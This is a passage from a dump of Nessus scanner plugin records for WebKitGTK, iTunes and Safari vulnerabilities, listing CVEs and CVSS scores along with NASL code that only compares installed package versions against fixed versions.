reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.22.5-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:48", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.9.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT209345 advisory.\n\n - Visiting a malicious website may lead to address bar spoofing (CVE-2018-4440)\n\n - Visiting a malicious website may lead to user interface spoofing (CVE-2018-4439)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4437, CVE-2018-4464)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4438)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-19T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.9.2 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2019-10-31T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_9_2.NASL", "href": "https://www.tenable.com/plugins/nessus/119767", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119767);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4439\",\n \"CVE-2018-4440\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n \"CVE-2018-4443\",\n \"CVE-2018-4464\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT209345\");\n\n script_name(english:\"Apple iTunes < 12.9.2 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on remote host is affected by multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.2. It is, therefore, affected by multiple\nvulnerabilities as referenced in the HT209345 advisory.\n\n - Visiting a malicious website may lead to address bar spoofing\n (CVE-2018-4440)\n\n - Visiting a malicious website may lead to user interface spoofing\n (CVE-2018-4439)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4437, CVE-2018-4464)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4438)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-ie/HT209345\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.9.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\nconstraints = [{'fixed_version':'12.9.2'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:55", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 12.0.2. It is, therefore, affected by the following vulnerabilities :\n\n - Input-validation errors exist that allow memory corruption leading to arbitrary code execution.\n (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and address bar spoofing.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-07T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 12.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4464"], "modified": "2019-11-01T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI12_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/119498", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119498);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4439\",\n \"CVE-2018-4440\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n \"CVE-2018-4443\",\n \"CVE-2018-4445\",\n \"CVE-2018-4464\"\n );\n\n script_name(english:\"macOS : Apple Safari < 12.0.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 12.0.2. It is, therefore, affected by the following\nvulnerabilities :\n\n - Input-validation errors exist that allow memory\n corruption leading to arbitrary code execution.\n (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441,\n CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and\naddress bar spoofing.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209344\");\n # https://lists.apple.com/archives/security-announce/2018/Dec/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?244b31ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 12.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(12|13|14)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"macOS Sierra 10.12 / macOS High Sierra 10.13 / macOS Mojave 10.14\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"12.0.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:08", "description": "The version of Apple Safari installed on the remote host is prior to 12.0.2. It is, therefore, affected by the following vulnerabilities :\n\n - Input-validation errors exist that allow memory corruption leading to arbitrary code execution. (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and address bar spoofing.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 12.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2018-4439", "CVE-2018-4445", "CVE-2018-4440"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700507.PRM", "href": "https://www.tenable.com/plugins/nnm/700507", "sourceData": "Binary data 700507.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:57", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7018), [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7030), [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7034), [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7037), [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7039), [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7046), [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7048), [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7055), [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7056), [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7061), [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11 disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-28T00:00:00", "type": "nessus", "title": "Fedora 26 : webkitgtk4 (2017-24bddb96b5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-24BDDB96B5.NASL", "href": "https://www.tenable.com/plugins/nessus/102023", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-24bddb96b5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102023);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n\n script_name(english:\"Fedora 26 : webkitgtk4 (2017-24bddb96b5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-24bddb96b5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.16.6-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:36:01", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7018), [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7030), [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7034), [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7037), [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7039), [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7046), [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7048), [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7055), [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7056), [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7061), [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11 disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "type": "nessus", "title": "Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-73D6A0DFBB.NASL", "href": "https://www.tenable.com/plugins/nessus/102047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-73d6a0dfbb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102047);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n\n script_name(english:\"Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-73d6a0dfbb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"webkitgtk4-2.16.6-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:57", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7018), [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7030), [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7034), [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg 